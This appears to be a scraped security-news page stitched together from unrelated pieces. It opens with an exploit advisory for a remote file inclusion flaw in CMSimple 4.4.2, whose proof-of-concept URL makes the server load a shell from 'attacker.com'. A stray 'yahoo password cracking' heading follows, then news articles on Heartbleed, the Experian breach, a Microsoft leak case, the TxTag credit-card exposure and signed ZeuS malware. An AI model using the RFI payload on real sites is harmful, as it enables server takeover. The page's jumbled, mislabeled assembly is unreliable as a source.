[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database. All data are stored in a simple file system.

[o] Vulnerable File

plugins/filebrowser/classes/required_classes.php

require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';

[o] Exploit

http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]

[o] PoC

http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?

yahoo password cracking

A major new security vulnerability dubbed Heartbleed was disclosed Monday night with severe implications for the entire Web. The bug can scrape a server's memory, where sensitive user data is stored, including private data such as usernames, passwords, and credit card numbers.
It's an extremely serious issue, affecting some 500,000 Web sites, according to Netcraft, an Internet research firm. Here's what you can do to make sure your information is protected, according to security experts contacted by CNET:
Do not log into accounts from afflicted sites until you're sure the company has patched the problem. If the company hasn't been forthcoming -- confirming a fix or keeping you up to date with progress -- reach out to its customer service teams for information, said John Miller, security research manager for TrustWave, a security and compliance firm.
Some Web sites that appeared to have been affected included Yahoo and OKCupid, though the companies have said their sites are all or partly fixed (see below for details). You can check sites on an individual basis here, though caution is still advised even if the site gives you an "all clear" indication. If you're given a red flag, avoid the site for now. (Editors' note, April 10: Check our constantly updating list of the top 100 Web sites and their Heartbleed patch status.)
The natural response might be to want to change passwords immediately, but security experts suggest waiting for confirmation of a fix because further activity on a vulnerable site could exacerbate the problem.
Once you've got confirmation of a security patch, change passwords of sensitive accounts like banks and email first. Even if you've implemented two-factor authentication -- which, in addition to a password asks for another piece of identifying information, like a code that's been texted to you -- changing that password is recommended.
Don't be shy about reaching out to small businesses that have your data to make sure they are secure. While the high-profile companies like Yahoo and Imgur certainly know about the problem, small businesses might not even be aware of it, said TrustWave's Miller. Be proactive about making sure your information is safe.
Keep a close eye on financial statements for the next few days. Because attackers can access a server's memory for credit card information, it wouldn't hurt to be on the lookout for unfamiliar charges on your bank statements.
Even after following these guidelines, there is still some riskiness in surfing the Web in the wake of the bug. Heartbleed is even said to affect browser cookies, which track users' activity on a site, so even visiting a vulnerable site without logging in could be unsafe. The Tor Project, which stresses anonymity and privacy, wrote in a blog post that users with those needs "might want to stay away from the Internet entirely for the next few days while things settle."
"I encourage users to not log in into [Yahoo] and other services that are affected since the credentials could have been leaked if they used the service," said Jaime Blasco, director of AlienVault Labs, a security research firm. "As soon as Yahoo solves the issue, it will be helpful if users change their password just in case."Yahoo seems to be the most major Web to site have been vulnerable to the bug (preliminary tests for Facebook, Google, and Twitter's Web sites said they appear to be safe). The company said that it has "successfully made appropriate corrections" to the main Yahoo properties: Yahoo Homepage, Search, Mail, Finance, Sports, Food, Tech, Flickr and Tumblr. Still, a Yahoo spokesperson said the company is still working to make the fix across the rest of the Yahoo sites.
Yahoo has been stressing authentication of late, so that the company would be able to provide a morepersonalized experience to users, a drum CEO Marissa Mayer has been beating almost since she took over the company. Yahoo provides services like email and fantasy sports, requiring passwords to get access to the applications.
The company has already had some trouble in the security arena. In January, the company had to reset the passwords of some email users after an attempted attack on a third-party's database. In response to the Heartbleed bug, some users have already expressed their outrage on Twitter. Brandon Oxford, from Royal, Ark., wrote: "After this I'm officially done with Yahoo email. I've now set up a Gmail. They seem to be more on top of stuff than Yahoo."
Other companies that were said to be affected chimed in as well. Imgur, the photo-sharing site popular with Reddit users, said: "[We] invalidated sensitive data such as cookies and session IDs, just to be on the safe side. We're proceeding with caution, since the nature of the attack makes it hard to detect, but we have no reason to believe it has been used against Imgur." OKCupid said, "The fix is now fully live on OKCupid."
The question in the aftermath of something like this is whether Web companies will reform their security practices. There has been a move toward Perfect Forward Secrecy (PFS) by many of the major Web companies, but not all of them have implemented the practice. PFS means essentially that encryption keys get a very short shelf life, and are not used forever. "People should want their communications to be secure as possible. PFS is one thing they can push for in the future," said Miller.

OpenSSL Heartbleed vulnerability CVE 2014 0160

It is advised to those who are running their web server with OpenSSL 1.0.1 through 1.0, then it is significantly important that you update to OpenSSL 1.0.1g immediately or as soon as possible. 

As this afternoon, an extremely critical programming flaw in the OpenSSL has been discovered that apparently exposed the cryptographic keys and private data from some of the most important sites and services on the Internet.

The bug was independently discovered by security firm Codenomicon along with a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library and its weakness allows cyber criminals to steal the information protected, under normal conditions, by the SSL (Secure Sockets Layer) or TLS (Transport Security Layer) encryption used to secure the Internet.

OpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.

HEARTBLEED BUG
The discoverer of the vulnerability dubbed the bug as ‘Heartbleed bug’, as the exploit rests on a bug in the implementation of OpenSSL’s TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520).

This critical bug with code ID CVE-2014-0160, could allows an attacker to expose up to 64kB of memory from the server or a connected client computer running a vulnerable version of OpenSSL software. Specifically, this means that an attacker can steal keys, passwords and other private information remotely.

We have tested some of our own services from attacker’s perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication.”

The vulnerability in the OpenSSL’s transport layer security (TSL) protocols’ heartbeat section has been in the wild since March 2012 and is supposed to be even more dangerous than Apple’s recent SSL bug, which outcropped the possibility for man-in-the-middle (MitM) attacks.

As the Heartbleed bug reveals encryption keys that could lead to other compromises, affects past traffic and may affect as much as 66 percent of Internet websites over the internet. 10 out of top 1000 sites are vulnerable to this flaw, including Yahoo Mail, Lastpass and the FBI site. There also is a proof-of-concept exploit for the flaw posted on Github. On this website, you can check if your web server is vulnerable or not.

"Bugs in single software or library come and go and are fixed by new versions," the researchers who discovered the vulnerability wrote in a blog post published Monday. "However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously."

Fixes for the bug have been released by the researchers. So, who are running the OpenSSL 1.0.1f version may update to OpenSSL 1.0.1g. The users running older version of OpenSSL are safe.



According to reports, a multistate investigation has been launched, after an Experian subsidiary, Court Ventures, was struck by a breach impacting more than 200 million Americans.
On Thursday, Reuters reported that attorneys general in Connecticut, Illinois, and potentially other states, planned to look into a major identity theft case where sensitive information, including Social Security numbers, addresses, dates of birth, phone numbers and email addresses of consumers, was exposed to criminals.
In October, security journalist Brian Krebs detailed how Experian indirectly sold consumer data to an ID theft servicerun by a Vietnamese national Hieu Minh Ngo. Court documents revealed that Ngo, posing as a private investigator, paid Court Ventures so he could access sensitive database information available to the firm.
Last month, Ngo pleaded guilty in a federal New Hampshire court to devising the scheme.
According to the Thursday Reuters report, state investigations will likely center on whether credit bureau Experian and other involved companies followed proper data security and breach disclosure laws.
On Friday, Jaclyn Falkowski, a spokeswoman for the Connecticut Attorney General's office, confirmed with SCMagazine.com via phone that “Connecticut will be inquiring on the breach,” but that the office had “no further comment,” on the matter.
That day, Maura Possley, a spokeswoman for the Illinois Attorney General's office, told SCMagazine.com that its probe was “part of a multistate investigation.”
“We are investigating based on reports of a data breach involving Experian,” Possley said.


A former Microsoft employee has pleaded guilty to charges related to sharing software code for looming company products.
On March 17 federal prosecutors charged Alex Kibkalo for handing the trade secrets over to an unknown technology blogger, who then proceeded to release the company software code online, according to court documents.
Kibkalo originally faced up to 10 years in prison as well as a fine of up to $250,000, but according to Monday's plea agreement, he and prosecutors recommended a three-month prison term and a fine of $22,500 to the court.
In order to find out who was supplying the code, Microsoft searched the blogger's Hotmail account, a service provided by the tech giant. This move gained attention from privacy advocates, which prompted the company to change its policy related to cases like this, according to the Wall Street Journal.

TxDOT TxTag Credit card hacked

Do you know, Why another major company is getting hacked every week? Because of poor policies, Laziness to Incident Response and lack in will-power to put efforts on applying important patches.

Some companies are not taking their security more seriously, and best suitable example for this is TxTag, an electronic toll collection systems in Texas operated by Texas Department of Transportation (TxDOT).

1.2 MILLION CREDIT CARD ARE AT RISK
Security researcher, David Longenecker claimed a serious flaw at TxTag website that exposes the active Credit Card Details and Personal Information of 1.2 Million Drivers including active TxTags (vehicle stickers with microchips, which are scanned by electronic readers on toll roads), Names, phone numbers, full residence addresses, email addresses, along with their complete Credit card numbers and Expiration date.

According to David, the account names could be easily predictable by anyone, which is typically an 8-digit number that begins with the number 2 and protected by only a 4-digit PIN Number, that could be itself another easy x-factor to abuse.
Texas Transportation Department hacked
But their stupidity didn’t end here, to make the case worst for their users; TxTag.org inexplicably stores the entire credit card details including Credit Card Numbers and expiration date, which meant to be partial visible to users, but available in the plaintext as the value of input field on the page source code.
Texas Transportation Department hacked
"I have no indication credit cards have actually been stolen. I merely found and reported a flaw that could very easily be exploited to obtain this information." he said.

NO LESSONS LEARNED FROM PREVIOUS CYBER ATTACK
Texas Department of Transportation had not learned any lesson from their past experiences with hackers. Exactly two years back, they themselves confirmed a "cyber attack" in which the hackers overloaded the TxTag back office accounts servers, but according to TxTag, no accounts were compromised at the time.

In the reply back in 2012, Karen Amacker, TxDOT spokesman said, "Customer service and information security are of paramount importance to TxDOT. Cyberattackers recently tried to get into TxTag.org, but were not successful. All of our customers' information, including credit card information, remains secure."

But this security and so called paramount importance is seems to be a dilemma for them as they did nothing to improve the data security of their users after facing an attack.

FLAW REPORTED, BUT YET NO RESPONSE
The Flaw has been reported by the researcher, but neither TxTag nor TxDOT have so far responded to any of his request for comment.

"The problem lies in the AutoPay Method screen. If you do not have a credit card or bank account stored for automatic payments, then financial data cannot be stolen through this manner." david said.

We should understand that no one is safe when bad hackers are out to do some damage. You are always advised to don't be lazy with your passwords, set tough-to-guess and long passwords and don't store information online that you don’t absolutely need to. Stay Tuned, Stay Safe.



A variant of the bank-account-raiding ZeuS Trojan is masquerading as a legit Windows app using a valid digital signature – and packs a rootkit to burrow deep into victims' PCs.
It appears miscreants have somehow gained access to the private signing certificate belonging to a Microsoft-registered developer, and used it to cryptographically sign the malware's executable. This cert should be kept a closely guarded secret.

The Windows operating system and antivirus tools can check the validity of a program's digital signature before trusting it, because an invalid signature indicates the code has been tampered with in transit, for instance. By generating a valid signature for the ZeuS Trojan, crims can dress the software nasty up as a legit application.

It's a sign that crooks are adopting tactics used by sophisticated espionage software, such as Flame: signing binaries to slip code onto victims' machines is part and parcel of modern-day cyber-spying. The use of stolen certs by criminals is rare but not unprecedented.

Researchers at SSL-certificate flogger Comodo, using telemetry collected from users of its security software, detected 200 installs of this latest ZeuS variant.

ZeuS (aka Zbot) is typically distributed by hackers planting malicious code on legitimate websites that exploit browser bugs to install the nasty, or through email phishing by tricking netizens into running attachments.

The malware discovered by Comodo presented itself a web-page with the Internet Explorer logo on it, whereas it's really a malicious signed executable that drops an installer on the hard drive to run, which tries to download a rootkit from the web. This is decrypted into a driver and lined up to execute early on in the PC's boot sequence – meaning it can get to work hiding the Trojan from the rest of the operating system and applications, particularly tools that try to remove the Trojan.

When running, the software's goal is to intercept usernames and passwords, credit card numbers and other highly sensitive personal information submitted through website forms – particularly those on banking websites – and siphon the data off to crooks to exploit.

Richards Moulds, veep of product strategy at Thales e-Security, said that the digitally signed ZeuS binary undermines the system of trust that Windows and other operating systems rely on.
"Windows, iOS, Android, and Linux all use code signing to ensure that only legitimate, signed code is installed and executed," Moulds explained. "Code-signing provides the best mechanism for proving that code hasn’t been modified and therefore is a way of spotting malware infected software and rejecting it. If an attacker can sign their malicious code in a way that passes this validation process they are a huge step further in mounting an attack."


Your Location

IP